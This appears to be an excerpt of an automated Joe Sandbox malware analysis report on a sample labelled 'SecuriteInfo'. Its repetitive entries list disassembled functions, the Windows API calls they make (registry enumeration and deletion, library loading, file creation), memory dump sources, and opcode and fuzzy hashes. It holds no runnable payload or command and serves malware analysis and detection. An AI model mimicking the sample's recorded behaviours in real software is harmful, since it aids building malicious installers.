                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                            • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                            • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                            • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                            Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                            • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                            • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                            • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                            Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                            • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                            • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                            • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                            Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402057
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: d1a534bdac8ab4a375a67c0f9322d902bd9b954321ea6e1800b8380d6ebd8416
                                                                            • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
                                                                            • Opcode Fuzzy Hash: d1a534bdac8ab4a375a67c0f9322d902bd9b954321ea6e1800b8380d6ebd8416
                                                                            • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
                                                                            Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: 2dbb90817d3466964644462ae49b83c0ff048dcda9f110866345d3753b39abd0
                                                                            • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                                            • Opcode Fuzzy Hash: 2dbb90817d3466964644462ae49b83c0ff048dcda9f110866345d3753b39abd0
                                                                            • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                                            Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: f85ecda1541d48c2eacd468b36386ab34562a3993df006b1de11f0f736a539f7
                                                                            • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                                            • Opcode Fuzzy Hash: f85ecda1541d48c2eacd468b36386ab34562a3993df006b1de11f0f736a539f7
                                                                            • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                            • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                            • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                            • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                            Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: 15234d5bd8e4dcd6d792e6f63076afaa231503a3d6edbacb390880a8125533c4
                                                                            • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                                            • Opcode Fuzzy Hash: 15234d5bd8e4dcd6d792e6f63076afaa231503a3d6edbacb390880a8125533c4
                                                                            • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                                            Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405393
                                                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2896919175-0
                                                                            • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                            • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                                                            • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                            • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                                                            Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: 009c69f53e9950683efb76fdc5a6e8cdc372d449b4d3b3bde035592a44acf5fc
                                                                            • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                                            • Opcode Fuzzy Hash: 009c69f53e9950683efb76fdc5a6e8cdc372d449b4d3b3bde035592a44acf5fc
                                                                            • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                                            Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: b8454ca33cf51575de2547d3164565982b70b773dc2d1b9c3ff8f16f5a6c27f1
                                                                            • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                                                            • Opcode Fuzzy Hash: b8454ca33cf51575de2547d3164565982b70b773dc2d1b9c3ff8f16f5a6c27f1
                                                                            • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                                                            Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                                              • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                                              • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                                            Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
